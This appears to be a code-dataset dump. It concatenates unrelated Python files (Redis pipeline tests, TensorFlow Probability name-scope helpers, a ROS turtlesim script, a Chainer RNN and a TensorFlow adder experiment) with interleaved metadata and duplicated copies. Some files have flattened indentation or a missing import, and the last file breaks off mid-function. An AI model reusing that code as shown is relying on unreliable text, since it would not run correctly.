from redistest import RedisTestCase, async_test
from tornadoredis.exceptions import ResponseError
class PipelineTestCase(RedisTestCase):
@async_test
@gen.engine
def test_pipe_simple(self):
pipe = self.client.pipeline()
pipe.set('foo', '123')
pipe.set('bar', '456')
pipe.mget(('foo', 'bar'))
res = yield gen.Task(pipe.execute)
self.assertEqual(res, [True, True, ['123', '456', ]])
self.stop()
@async_test
@gen.engine
def test_pipe_multi(self):
pipe = self.client.pipeline(transactional=True)
pipe.set('foo', '123')
pipe.set('bar', '456')
pipe.mget(('foo', 'bar'))
res = yield gen.Task(pipe.execute)
self.assertEqual(res, [True, True, ['123', '456', ]])
self.stop()
@async_test
@gen.engine
def test_pipe_error(self):
pipe = self.client.pipeline()
pipe.sadd('foo', 1)
pipe.sadd('foo', 2)
pipe.rpop('foo')
res = yield gen.Task(pipe.execute)
self.assertEqual(res[:2], [1, 1])
self.assertIsInstance(res[2], ResponseError)
self.stop()
@async_test
@gen.engine
def test_two_pipes(self):
pipe = self.client.pipeline()
pipe.rpush('foo', '1')
pipe.rpush('foo', '2')
pipe.lrange('foo', 0, -1)
res = yield gen.Task(pipe.execute)
self.assertEqual(res, [True, 2, ['1', '2']])
pipe.sadd('bar', '3')
pipe.sadd('bar', '4')
pipe.smembers('bar')
pipe.scard('bar')
res = yield gen.Task(pipe.execute)
self.assertEqual(res, [1, 1, set(['3', '4']), 2])
self.stop()
@async_test
@gen.engine
def test_mix_with_pipe(self):
pipe = self.client.pipeline()
res = yield gen.Task(self.client.set, 'foo', '123')
self.assertTrue(res)
yield gen.Task(self.client.hmset, 'bar', {'zar': 'gza'},)
pipe.get('foo')
res = yield gen.Task(self.client.get, 'foo')
self.assertEqual(res, '123')
pipe.hgetall('bar')
res = yield gen.Task(pipe.execute)
self.assertEqual(res, ['123', {'zar': 'gza'}])
self.stop()
@async_test
@gen.engine
def test_mix_with_pipe_multi(self):
pipe = self.client.pipeline(transactional=True)
res = yield gen.Task(self.client.set, 'foo', '123')
self.assertTrue(res)
yield gen.Task(self.client.hmset, 'bar', {'zar': 'gza'},)
pipe.get('foo')
res = yield gen.Task(self.client.get, 'foo')
self.assertEqual(res, '123')
pipe.hgetall('bar')
res = yield gen.Task(pipe.execute)
self.assertEqual(res, ['123', {'zar': 'gza'}])
self.stop()
@async_test
@gen.engine
def test_pipe_watch(self):
res = yield gen.Task(self.client.watch, 'foo')
self.assertTrue(res)
res = yield gen.Task(self.client.set, 'bar', 'zar')
self.assertTrue(res)
pipe = self.client.pipeline(transactional=True)
pipe.get('bar')
res = yield gen.Task(pipe.execute)
self.assertEqual(res, ['zar', ])
self.stop()
@async_test
@gen.engine
def test_pipe_watch2(self):
res = yield gen.Task(self.client.set, 'foo', 'bar')
self.assertTrue(res)
res = yield gen.Task(self.client.watch, 'foo')
self.assertTrue(res)
res = yield gen.Task(self.client.set, 'foo', 'zar')
self.assertTrue(res)
pipe = self.client.pipeline(transactional=True)
pipe.get('foo')
res = yield gen.Task(pipe.execute)
self.assertEqual(res, [])
self.stop()
    @async_test
    @gen.engine
    def test_pipe_unwatch(self):
        # UNWATCH after the watched key changed: the subsequent transaction
        # must succeed and see the new value.
        res = yield gen.Task(self.client.set, 'foo', 'bar')
        self.assertTrue(res)
        res = yield gen.Task(self.client.watch, 'foo')
        self.assertTrue(res)
        res = yield gen.Task(self.client.set, 'foo', 'zar')
        self.assertTrue(res)
        res = yield gen.Task(self.client.unwatch)
        self.assertTrue(res)
        pipe = self.client.pipeline(transactional=True)
        pipe.get('foo')
        res = yield gen.Task(pipe.execute)
        self.assertEqual(res, ['zar'])
        self.stop()
    @async_test
    @gen.engine
    def test_pipe_zsets(self):
        # Sorted-set commands through a transactional pipeline; zrange with
        # with_scores=True returns (member, score) pairs.
        pipe = self.client.pipeline(transactional=True)
        pipe.zadd('foo', 1, 'a')
        pipe.zadd('foo', 2, 'b')
        pipe.zscore('foo', 'a')
        pipe.zscore('foo', 'b')
        pipe.zrank('foo', 'a',)
        pipe.zrank('foo', 'b',)
        pipe.zrange('foo', 0, -1, True)
        pipe.zrange('foo', 0, -1, False)
        res = yield gen.Task(pipe.execute)
        self.assertEqual(res, [
            1, 1,
            1, 2,
            0, 1,
            [('a', 1.0), ('b', 2.0)],
            ['a', 'b'],
        ])
        self.stop()
    @async_test
    @gen.engine
    def test_pipe_zsets2(self):
        # Same sorted-set sequence as test_pipe_zsets but through a
        # non-transactional pipeline; results must not differ.
        pipe = self.client.pipeline(transactional=False)
        pipe.zadd('foo', 1, 'a')
        pipe.zadd('foo', 2, 'b')
        pipe.zscore('foo', 'a')
        pipe.zscore('foo', 'b')
        pipe.zrank('foo', 'a',)
        pipe.zrank('foo', 'b',)
        pipe.zrange('foo', 0, -1, True)
        pipe.zrange('foo', 0, -1, False)
        res = yield gen.Task(pipe.execute)
        self.assertEqual(res, [
            1, 1,
            1, 2,
            0, 1,
            [('a', 1.0), ('b', 2.0)],
            ['a', 'b'],
        ])
        self.stop()
    @async_test
    @gen.engine
    def test_pipe_hsets(self):
        # Hash writes plus HGETALL inside one MULTI/EXEC round trip.
        pipe = self.client.pipeline(transactional=True)
        pipe.hset('foo', 'bar', 'aaa')
        pipe.hset('foo', 'zar', 'bbb')
        pipe.hgetall('foo')
        res = yield gen.Task(pipe.execute)
        self.assertEqual(res, [
            True,
            True,
            {'bar': 'aaa', 'zar': 'bbb'}
        ])
        self.stop()
    @async_test
    @gen.engine
    def test_pipe_hsets2(self):
        # Same hash sequence as test_pipe_hsets but non-transactional.
        pipe = self.client.pipeline(transactional=False)
        pipe.hset('foo', 'bar', 'aaa')
        pipe.hset('foo', 'zar', 'bbb')
        pipe.hgetall('foo')
        res = yield gen.Task(pipe.execute)
        self.assertEqual(res, [
            True,
            True,
            {'bar': 'aaa', 'zar': 'bbb'}
        ])
        self.stop()
    @async_test
    @gen.engine
    def test_response_error(self):
        # LLEN on a string-typed key is a Redis type error; the client
        # surfaces it as a ResponseError return value rather than raising.
        res = yield gen.Task(self.client.set, 'foo', 'bar')
        self.assertTrue(res)
        res = yield gen.Task(self.client.llen, 'foo')
        self.assertIsInstance(res, ResponseError)
        self.stop()
|
ru
| 0.26433
|
#!/usr/bin/env python
| 2.320764
| 2
|
tensorflow_probability/python/internal/name_util.py
|
Frightera/probability
| 1
|
6627556
|
# Copyright 2018 The TensorFlow Probability Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Utility functions for dealing with `tf.name_scope` names."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import contextlib
import re
import tensorflow.compat.v1 as tf1
import tensorflow.compat.v2 as tf
__all__ = [
'camel_to_lower_snake',
'get_name_scope_name',
'instance_scope'
]
_IN_INSTANCE_SCOPE = False
_valid_chars_re = re.compile(r'[^a-zA-Z0-9_]+')
_camel_snake_re = re.compile(r'((?<=[a-z0-9])[A-Z]|(?!^)(?<!_)[A-Z](?=[a-z]))')
def strip_invalid_chars(name):
  """Collapse runs of characters outside [a-zA-Z0-9_] to '_', trimming edges."""
  if not name:
    return ''
  return _valid_chars_re.sub('_', name).strip('_')
def camel_to_lower_snake(name):
  """Convert a CamelCase identifier to lower_snake_case ('' stays '')."""
  if not name:
    return ''
  return _camel_snake_re.sub(r'_\1', name).lower()
def get_name_scope_name(name):
  """Returns the input name as a unique `tf.name_scope` name."""
  # A trailing '/' marks an already-fully-qualified scope: pass it through.
  if name and name[-1] == '/':
    return name
  name = strip_invalid_chars(name)
  # Entering (and immediately leaving) a name_scope yields the uniquified
  # scope string TF would assign for this name.
  with tf.name_scope(name) as unique_name:
    pass
  return unique_name
@contextlib.contextmanager
def instance_scope(instance_name, constructor_name_scope):
  """Constructs a name scope for methods of a distribution (etc.) instance."""
  global _IN_INSTANCE_SCOPE
  with tf.name_scope(_instance_scope_name(instance_name,
                                          constructor_name_scope)
                     ) as name_scope:
    # Save/restore the module flag so nested instance scopes (a method of
    # one instance calling into another) unwind correctly.
    was_in_instance_scope = _IN_INSTANCE_SCOPE
    _IN_INSTANCE_SCOPE = True
    try:
      yield name_scope
    finally:
      _IN_INSTANCE_SCOPE = was_in_instance_scope
def _instance_scope_name(instance_name, constructor_name_scope):
  """Specifies a name scope for methods of a distribution (etc.) instance."""
  # NOTE(review): this `global` is read-only here; the flag is only mutated
  # by `instance_scope` above.
  global _IN_INSTANCE_SCOPE
  current_parent_scope = _get_parent_scope(_name_scope_dry_run(instance_name))
  constructor_parent_scope = _get_parent_scope(constructor_name_scope)
  if current_parent_scope == constructor_parent_scope:
    # Reuse initial scope.
    return constructor_name_scope
  if _IN_INSTANCE_SCOPE:
    # Elide the constructor scope annotation when we're inside a method of a
    # higher-level distribution (which should itself have annotated its
    # constructor scope).
    constructor_scope_annotation = ''
  else:
    # Otherwise, include a reference to the sanitized constructor scope.
    # `[:-1]` drops the trailing '/'; an empty parent means top level.
    constructor_scope_annotation = (
        '_CONSTRUCTED_AT_' + (strip_invalid_chars(constructor_parent_scope[:-1])
                              if constructor_parent_scope[:-1]
                              else 'top_level'))
  return (current_parent_scope +
          instance_name +
          constructor_scope_annotation + '/')
def _get_parent_scope(scope):
"""Removes the final leaf from a scope (`a/b/c/` -> `a/b/`)."""
parts = scope.split('/')
return '/'.join(parts[:-2] + parts[-1:])
def _name_scope_dry_run(name):
  """Constructs a scope like `tf.name_scope` but without marking it used."""
  if tf.executing_eagerly():
    # Names in eager mode are not unique, so we can just invoke name_scope
    # directly.
    with tf.name_scope(name) as name_scope:
      return name_scope
  graph = tf1.get_default_graph()
  if not name:
    name = ''
  elif name[-1] != '/':
    # mark_as_used=False keeps this a dry run: the graph's uniquifier is
    # consulted but its counters are not advanced.
    name = graph.unique_name(name, mark_as_used=False) + '/'
  return name
|
# Copyright 2018 The TensorFlow Probability Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Utility functions for dealing with `tf.name_scope` names."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import contextlib
import re
import tensorflow.compat.v1 as tf1
import tensorflow.compat.v2 as tf
__all__ = [
'camel_to_lower_snake',
'get_name_scope_name',
'instance_scope'
]
_IN_INSTANCE_SCOPE = False
_valid_chars_re = re.compile(r'[^a-zA-Z0-9_]+')
_camel_snake_re = re.compile(r'((?<=[a-z0-9])[A-Z]|(?!^)(?<!_)[A-Z](?=[a-z]))')
def strip_invalid_chars(name):
  """Collapse runs of characters outside [a-zA-Z0-9_] to '_', trimming edges."""
  return re.sub(_valid_chars_re, r'_', name).strip('_') if name else ''
def camel_to_lower_snake(name):
  """Convert a CamelCase identifier to lower_snake_case ('' stays '')."""
  return (re.sub(_camel_snake_re, r'_\1', name).lower()
          if name else '')
def get_name_scope_name(name):
  """Returns the input name as a unique `tf.name_scope` name."""
  # A trailing '/' marks an already-fully-qualified scope: pass it through.
  if name and name[-1] == '/':
    return name
  name = strip_invalid_chars(name)
  # Entering (and immediately leaving) a name_scope yields the uniquified
  # scope string TF would assign for this name.
  with tf.name_scope(name) as unique_name:
    pass
  return unique_name
@contextlib.contextmanager
def instance_scope(instance_name, constructor_name_scope):
  """Constructs a name scope for methods of a distribution (etc.) instance."""
  global _IN_INSTANCE_SCOPE
  with tf.name_scope(_instance_scope_name(instance_name,
                                          constructor_name_scope)
                     ) as name_scope:
    # Save/restore the module flag so nested instance scopes unwind correctly.
    was_in_instance_scope = _IN_INSTANCE_SCOPE
    _IN_INSTANCE_SCOPE = True
    try:
      yield name_scope
    finally:
      _IN_INSTANCE_SCOPE = was_in_instance_scope
def _instance_scope_name(instance_name, constructor_name_scope):
  """Specifies a name scope for methods of a distribution (etc.) instance."""
  # NOTE(review): this `global` is read-only here; only `instance_scope`
  # mutates the flag.
  global _IN_INSTANCE_SCOPE
  current_parent_scope = _get_parent_scope(_name_scope_dry_run(instance_name))
  constructor_parent_scope = _get_parent_scope(constructor_name_scope)
  if current_parent_scope == constructor_parent_scope:
    # Reuse initial scope.
    return constructor_name_scope
  if _IN_INSTANCE_SCOPE:
    # Elide the constructor scope annotation when we're inside a method of a
    # higher-level distribution (which should itself have annotated its
    # constructor scope).
    constructor_scope_annotation = ''
  else:
    # Otherwise, include a reference to the sanitized constructor scope.
    # `[:-1]` drops the trailing '/'; an empty parent means top level.
    constructor_scope_annotation = (
        '_CONSTRUCTED_AT_' + (strip_invalid_chars(constructor_parent_scope[:-1])
                              if constructor_parent_scope[:-1]
                              else 'top_level'))
  return (current_parent_scope +
          instance_name +
          constructor_scope_annotation + '/')
def _get_parent_scope(scope):
  """Removes the final leaf from a scope (`a/b/c/` -> `a/b/`)."""
  # Splitting 'a/b/c/' gives ['a', 'b', 'c', '']; dropping the second-to-last
  # element removes the leaf while keeping the trailing '/'.
  parts = scope.split('/')
  return '/'.join(parts[:-2] + parts[-1:])
def _name_scope_dry_run(name):
  """Constructs a scope like `tf.name_scope` but without marking it used."""
  if tf.executing_eagerly():
    # Names in eager mode are not unique, so we can just invoke name_scope
    # directly.
    with tf.name_scope(name) as name_scope:
      return name_scope
  graph = tf1.get_default_graph()
  if not name:
    name = ''
  elif name[-1] != '/':
    # mark_as_used=False keeps this a dry run: the uniquifier is consulted
    # without advancing its counters.
    name = graph.unique_name(name, mark_as_used=False) + '/'
  return name
|
en
| 0.830723
|
# Copyright 2018 The TensorFlow Probability Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================ Utility functions for dealing with `tf.name_scope` names. Returns the input name as a unique `tf.name_scope` name. Constructs a name scope for methods of a distribution (etc.) instance. Specifies a name scope for methods of a distribution (etc.) instance. # Reuse initial scope. # Elide the constructor scope annotation when we're inside a method of a # higher-level distribution (which should itself have annotated its # constructor scope). # Otherwise, include a reference to the sanitized constructor scope. Removes the final leaf from a scope (`a/b/c/` -> `a/b/`). Constructs a scope like `tf.name_scope` but without marking it used. # Names in eager mode are not unique, so we can just invoke name_scope # directly.
| 2.131526
| 2
|
melodic/lib/turtle_tf/turtle_tf_message_broadcaster.py
|
Dieptranivsr/Ros_Diep
| 2
|
6627557
|
<reponame>Dieptranivsr/Ros_Diep<filename>melodic/lib/turtle_tf/turtle_tf_message_broadcaster.py
#!/usr/bin/env python
# Software License Agreement (BSD License)
#
# Copyright (c) 2008, <NAME>, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of the <NAME> nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#!/usr/bin/env python
import rospy
import turtlesim.msg
import geometry_msgs.msg
import turtlesim.srv
from geometry_msgs.msg import PointStamped, Point
from std_msgs.msg import Header
class PointPublisher:
    """Republishes a turtle's Pose as a PointStamped on 'turtle_point_stamped'."""

    def handle_turtle_pose(self, msg, turtlename):
        # Stamp with current ROS time in the "/world" frame; z fixed to 0
        # (turtlesim is planar). Header seq is hard-coded to 0.
        self.pub.publish(PointStamped(Header(0, rospy.rostime.get_rostime(), "/world"), Point(msg.x, msg.y, 0)))

    def __init__(self):
        # Turtle name is hard-coded rather than read from a ROS parameter.
        self.turtlename = "turtle3"  # rospy.get_param('~turtle')
        self.sub = rospy.Subscriber('/%s/pose' % self.turtlename,
                                    turtlesim.msg.Pose,
                                    self.handle_turtle_pose,
                                    self.turtlename)
        self.pub = rospy.Publisher('turtle_point_stamped', PointStamped, queue_size=1)
if __name__ == '__main__':
    rospy.init_node('tf_turtle_stamped_msg_publisher')
    # Spawn 'turtle3' at (4, 2) with heading 0, then republish its pose.
    rospy.wait_for_service('spawn')
    spawner = rospy.ServiceProxy('spawn', turtlesim.srv.Spawn)
    spawner(4, 2, 0, 'turtle3')
    pp = PointPublisher()
    pub = rospy.Publisher("turtle3/cmd_vel", geometry_msgs.msg.Twist, queue_size=1)
    # Drive the turtle in a circle (constant linear + angular velocity),
    # sending commands at roughly 10 Hz until shutdown.
    while not rospy.is_shutdown():
        msg = geometry_msgs.msg.Twist()
        msg.linear.x = 1
        msg.angular.z = 1
        pub.publish(msg)
        rospy.sleep(rospy.Duration(0.1))
|
#!/usr/bin/env python
# Software License Agreement (BSD License)
#
# Copyright (c) 2008, <NAME>, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of the <NAME> nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#!/usr/bin/env python
import rospy
import turtlesim.msg
import geometry_msgs.msg
import turtlesim.srv
from geometry_msgs.msg import PointStamped, Point
from std_msgs.msg import Header
class PointPublisher:
    """Republishes a turtle's Pose as a PointStamped on 'turtle_point_stamped'."""

    def handle_turtle_pose(self, msg, turtlename):
        # Stamp with current ROS time in the "/world" frame; z fixed to 0.
        self.pub.publish(PointStamped(Header(0, rospy.rostime.get_rostime(), "/world"), Point(msg.x, msg.y, 0)))

    def __init__(self):
        # Turtle name is hard-coded rather than read from a ROS parameter.
        self.turtlename = "turtle3"  # rospy.get_param('~turtle')
        self.sub = rospy.Subscriber('/%s/pose' % self.turtlename,
                                    turtlesim.msg.Pose,
                                    self.handle_turtle_pose,
                                    self.turtlename)
        self.pub = rospy.Publisher('turtle_point_stamped', PointStamped, queue_size=1)
if __name__ == '__main__':
    rospy.init_node('tf_turtle_stamped_msg_publisher')
    # Spawn 'turtle3' at (4, 2) with heading 0, then republish its pose.
    rospy.wait_for_service('spawn')
    spawner = rospy.ServiceProxy('spawn', turtlesim.srv.Spawn)
    spawner(4, 2, 0, 'turtle3')
    pp = PointPublisher()
    pub = rospy.Publisher("turtle3/cmd_vel", geometry_msgs.msg.Twist, queue_size=1)
    # Drive the turtle in a circle at roughly 10 Hz until shutdown.
    while not rospy.is_shutdown():
        msg = geometry_msgs.msg.Twist()
        msg.linear.x = 1
        msg.angular.z = 1
        pub.publish(msg)
        rospy.sleep(rospy.Duration(0.1))
|
en
| 0.696197
|
#!/usr/bin/env python # Software License Agreement (BSD License) # # Copyright (c) 2008, <NAME>, Inc. # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions # are met: # # * Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # * Redistributions in binary form must reproduce the above # copyright notice, this list of conditions and the following # disclaimer in the documentation and/or other materials provided # with the distribution. # * Neither the name of the <NAME> nor the names of its # contributors may be used to endorse or promote products derived # from this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS # FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE # COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, # INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, # BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; # LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER # CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT # LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN # ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE # POSSIBILITY OF SUCH DAMAGE. #!/usr/bin/env python # rospy.get_param('~turtle')
| 1.756127
| 2
|
src/05_ptb_rnn/RNN.py
|
corochann/deep-learning-tutorial-with-chainer
| 31
|
6627558
|
import chainer
import chainer.functions as F
import chainer.links as L
class RNN(chainer.Chain):
    """Elman-style recurrent network: embed -> tanh recurrent layer -> softmax logits."""

    def __init__(self, n_vocab, n_units):
        super(RNN, self).__init__()
        with self.init_scope():
            self.embed = L.EmbedID(n_vocab, n_units)   # token id -> embedding
            self.l1 = L.Linear(n_units, n_units)       # input-to-hidden
            self.r1 = L.Linear(n_units, n_units)       # hidden-to-hidden
            self.l2 = L.Linear(n_units, n_vocab)       # hidden-to-vocab logits
        self.recurrent_h = None

    def reset_state(self):
        """Clear the hidden state before starting a new sequence."""
        self.recurrent_h = None

    def __call__(self, x):
        embedded = self.embed(x)
        pre_activation = self.l1(embedded)
        # Fold in the previous hidden state after the first step.
        if self.recurrent_h is not None:
            pre_activation = pre_activation + self.r1(self.recurrent_h)
        self.recurrent_h = F.tanh(pre_activation)
        return self.l2(self.recurrent_h)
|
import chainer
import chainer.functions as F
import chainer.links as L
class RNN(chainer.Chain):
    """Simple Recurrent Neural Network implementation"""
    def __init__(self, n_vocab, n_units):
        super(RNN, self).__init__()
        with self.init_scope():
            self.embed = L.EmbedID(n_vocab, n_units)  # token id -> embedding
            self.l1 = L.Linear(n_units, n_units)      # input-to-hidden
            self.r1 = L.Linear(n_units, n_units)      # hidden-to-hidden
            self.l2 = L.Linear(n_units, n_vocab)      # hidden-to-vocab logits
        # Hidden state carried across calls; None until the first step.
        self.recurrent_h = None
    def reset_state(self):
        # Clear the hidden state before starting a new sequence.
        self.recurrent_h = None
    def __call__(self, x):
        h = self.embed(x)
        if self.recurrent_h is None:
            # First step: no previous hidden state to fold in.
            self.recurrent_h = F.tanh(self.l1(h))
        else:
            self.recurrent_h = F.tanh(self.l1(h) + self.r1(self.recurrent_h))
        y = self.l2(self.recurrent_h)
        return y
|
en
| 0.577915
|
Simple Recurrent Neural Network implementation
| 3.43484
| 3
|
experiments/add/add.py
|
namin/d4
| 42
|
6627559
|
<filename>experiments/add/add.py<gh_stars>10-100
from collections import namedtuple
import numpy as np
import tensorflow as tf
from experiments.nam_seq2seq import NAMSeq2Seq
from experiments.data import load_data, DatasetBatcher
# logging.basicConfig(level=logging.DEBUG)
# NOTE(review): threshold=np.nan is rejected by modern NumPy (use
# sys.maxsize); it matched the NumPy this TF-0.x-era script targeted.
np.set_printoptions(linewidth=20000, precision=2, suppress=True, threshold=np.nan)
# num_steps = seq_length * 6 + 6
# stack_size = seq_length * 2 + 10
#
# seq_len = 1
# num_steps = 12
# stack_size = 12
# seq_length = 3
# num_steps = 24
# stack_size = 16
# seq_length = 10
# num_steps = 66
# stack_size = 30
SUMMARY_LOG_DIR = "./tmp/add/summaries"
# choose add - learning rate 0.05
# Command-line flags; -1 for the step/stack sizes means "derive from data"
# (see main()).
tf.app.flags.DEFINE_integer("batch_size", 128, "Batch size")
tf.app.flags.DEFINE_float("learning_rate", 0.01, "Learning rate")
tf.app.flags.DEFINE_integer("train_num_steps", -1, "Training phase - number of steps")
tf.app.flags.DEFINE_integer("train_stack_size", -1, "Training phase - stack size")
tf.app.flags.DEFINE_integer("test_num_steps", -1, "Testing phase - number of steps")
tf.app.flags.DEFINE_integer("test_stack_size", -1, "Testing phase - stack size")
tf.app.flags.DEFINE_integer("min_return_width", 5, "Minimum return width")
tf.app.flags.DEFINE_integer("eval_every", 5, "Evaluate every n-th step")
tf.app.flags.DEFINE_integer("max_epochs", 1000, "Maximum number of epochs")
tf.app.flags.DEFINE_string("id", "x", "unique id for summary purposes")
tf.app.flags.DEFINE_float("init_weight_stddev", 0.1, "Standard deviation for initial weights")
tf.app.flags.DEFINE_float("max_grad_norm", 1.0, "Clip gradients to this norm.")
tf.app.flags.DEFINE_float("grad_noise_eta", 0.01, "Gradient noise scale.")
tf.app.flags.DEFINE_float("grad_noise_gamma", 0.55, "Gradient noise gamma.")
tf.app.flags.DEFINE_string("dataset",
                           "data/add/train_len/train1_test4",
                           "unique id for summary purposes")
tf.app.flags.DEFINE_string("sketch", "adder_choose", "sketch")
tf.app.flags.DEFINE_boolean("save_summary", True, "Save summary files.")
def print_flags(flags):
    """Dump every registered tf.app flag name/value (for run reproducibility)."""
    print("Flag values")
    flag_map = flags.__dict__['__flags']
    for flag_name in flag_map:
        print(' ', flag_name, ':', flag_map[flag_name])
FLAGS = tf.app.flags.FLAGS
# Immutable parameter bundles handed to NAMSeq2Seq (see main()).
d4InitParams = namedtuple(
    "d4InitParams", "stack_size value_size batch_size min_return_width init_weight_stddev")
TrainParams = namedtuple(
    "TrainParams", "train learning_rate num_steps max_grad_norm grad_noise_eta grad_noise_gamma")
TestParams = namedtuple("TestParams", "stack_size num_steps")
def main(_):
    """Train the NAM seq2seq adder sketch; checkpoint on dev improvement and
    report test accuracy once dev partial accuracy reaches 1.0."""
    dataset_path = FLAGS.dataset
    datasets = load_data(dataset_path)
    print('dataset path:', dataset_path)

    def load_scaffold_from_file(filename):
        # Read the d4 sketch source verbatim.
        with open(filename, "r") as f:
            scaffold = f.read()
        return scaffold
    sketch = load_scaffold_from_file(FLAGS.sketch)
    # calculate value_size automatically
    # (+2 leaves headroom above the largest symbol seen in any split)
    value_size = max(datasets.train.input_seq.max(), datasets.train.target_seq.max(),
                     datasets.dev.input_seq.max(), datasets.dev.target_seq.max(),
                     datasets.test.input_seq.max(), datasets.test.target_seq.max(),
                     datasets.debug.input_seq.max(), datasets.debug.target_seq.max()) + 2
    print('value_size', value_size)
    dataset_train = datasets.train
    dataset_dev = datasets.dev
    dataset_test = datasets.test
    train_batcher = DatasetBatcher(dataset_train, FLAGS.batch_size)
    # The last column of input_seq appears to carry the sequence length --
    # TODO(review): confirm against the data loader.
    train_seq_len = dataset_train.input_seq[:, -1].max()
    test_seq_len = dataset_test.input_seq[:, -1].max()
    dev_seq_len = dataset_dev.input_seq[:, -1].max()
    # Heuristic budgets: machine steps and stack depth grow linearly with
    # the longest sequence in each split.
    train_num_steps = train_seq_len * 8 + 6
    test_num_steps = test_seq_len * 8 + 6
    dev_num_steps = dev_seq_len * 8 + 6
    train_stack_size = train_seq_len * 3 + 10
    test_stack_size = test_seq_len * 3 + 10
    # -1 means "derive from the data"; an explicit flag value wins.
    FLAGS.train_num_steps = (train_num_steps if FLAGS.train_num_steps == -1
                             else FLAGS.train_num_steps)
    FLAGS.train_stack_size = (train_stack_size if FLAGS.train_stack_size == -1
                              else FLAGS.train_stack_size)
    FLAGS.test_num_steps = (test_num_steps if FLAGS.test_num_steps == -1
                            else FLAGS.test_num_steps)
